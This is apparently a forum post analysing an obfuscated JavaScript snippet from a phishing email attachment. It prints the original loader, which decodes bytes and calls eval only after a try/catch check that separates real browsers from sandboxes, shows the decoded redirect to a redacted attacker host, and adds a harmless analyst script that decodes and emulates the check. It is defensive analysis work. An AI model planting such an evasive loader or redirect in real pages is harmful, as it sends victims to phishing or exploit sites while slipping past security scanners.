I got this snippet in an HTML file attached to a phishing email.
d=document;a=[0x78,0x63,0x74,0x33,0x7f, etc...];for(i=0;i<a.length;i++){a[i]-=2;} try{d.body++}catch(q){zz=0;}try{zz&=2}catch(q){zz=1;} if(!zz)eval(String.fromCharCode.apply(String,a));
I’ve reformatted and annotated it for readability.
// hide redirect as ASCII bytes
a = [0x78,0x63,0x74,0x33, etc...];

// "decrypt" our malicious code
// maybe this is good enough to defeat filters looking for encoded redirects?
for (i = 0; i < a.length; i++) {
    a[i] -= 2;
}

// detect if we're in a real browser
try {
    // throws an exception in a real browser: the increment assigns NaN to
    // document.body, and the body setter refuses anything that isn't an element
    document.body++
} catch(e) {
    // running in a real browser
    notInBrowser = 0;
}

try {
    // this throws an exception if we didn't throw an exception above:
    // notInBrowser was never declared, so reading it is a ReferenceError
    notInBrowser &= 2
} catch(e) {
    notInBrowser = 1;
}

// if we are in a browser, do the redirect
// remember 0 == false and 1 == true
if (!notInBrowser) {
    eval(String.fromCharCode.apply(String,a));
}
The decrypted code fed to the eval:
var1=49; var2=var1; if(var1==var2) {document.location="http://[redacted]:8080/forum/links/column.php";}
I’m not sure what was at the URL. It was probably a phishing page or a browser exploit. If anyone can explain why they used a second try-catch instead of an if-statement, let me know.
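As an added example (not code from the phishing email or from this post), the script below reproduces the two halves of the snippet from an analyst's side: it undoes the subtract-2 transform without ever calling eval, and it emulates the try/catch environment check against two stub document objects so you can see which one actually reaches the eval. The byte array and the stand-in host example.invalid are constructed samples (the post truncates the real array with "etc..."); the first four bytes quoted above, 0x78,0x63,0x74,0x33, decode to "var1", matching the decrypted code.

```javascript
// Added example, not code from the phishing email or the original post.
// Decodes the shifted byte array without eval and emulates the
// try/catch environment check against stub `document` objects.

// Reverse the "subtract 2" transform and return the hidden source text.
function decodeShifted(bytes, shift = 2) {
  return String.fromCharCode(...bytes.map(b => b - shift));
}

// Forward transform, used only to build a constructed sample array below
// (the post truncates the real array with "etc...").
function encodeShifted(text, shift = 2) {
  return Array.from(text, ch => ch.charCodeAt(0) + shift);
}

// Constructed stand-in payload; example.invalid replaces the redacted host.
const SAMPLE_PAYLOAD =
  'var1=49;var2=var1;if(var1==var2){document.location="http://example.invalid/";}';
const SAMPLE_BYTES = encodeShifted(SAMPLE_PAYLOAD);

// Emulate the original control flow and report whether eval() would run.
// In the real snippet `zz` is an undeclared global: the first try assigns it
// only if `d.body++` throws, and the second try's `zz &= 2` throws a
// ReferenceError if it was never assigned. A `let` binding cannot reproduce
// "undeclared", so the `assigned` flag stands in for that state.
function wouldEval(doc) {
  let zz;
  let assigned = false;
  try {
    doc.body++;              // ToNumber(body) -> NaN, then assigns NaN back
  } catch (q) {
    zz = 0;                  // setter rejected the assignment: real browser
    assigned = true;
  }
  try {
    if (!assigned) throw new ReferenceError('zz is not defined');
    zz &= 2;                 // 0 & 2 === 0, so zz stays 0
  } catch (q) {
    zz = 1;                  // never hit a throwing setter: sandbox
  }
  return !zz;
}

// Stub 1: a naive sandbox where `document` is a plain object. The
// increment silently overwrites `body` with NaN and nothing throws.
const naiveSandboxDocument = { body: {} };

// Stub 2: a browser-like object whose `body` setter refuses non-element
// values, the behaviour that makes `document.body++` throw in real browsers.
const browserLikeDocument = {
  get body() { return {}; },
  set body(value) {
    throw new TypeError('HierarchyRequestError: body must be an element');
  },
};

// Analyst-facing summary: decoded text plus the verdict for each stub.
function analyze(bytes) {
  return {
    decoded: decodeShifted(bytes),
    evalsInNaiveSandbox: wouldEval(naiveSandboxDocument),
    evalsInBrowser: wouldEval(browserLikeDocument),
  };
}

console.log(analyze(SAMPLE_BYTES));
```

Running it prints the decoded text and shows that the naive stub never reaches eval while the browser-like stub does. The two-try structure is what makes that distinction work: in a sandbox where the increment silently succeeds, zz is never assigned at all, and the only way to turn "never assigned" into a usable flag without declaring the variable is to read it inside a second try and catch the ReferenceError.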
This guy has a similar post that explains the document.body++:
http://jeffreysambells.com/2012/12/12/anatomy-of-a-hack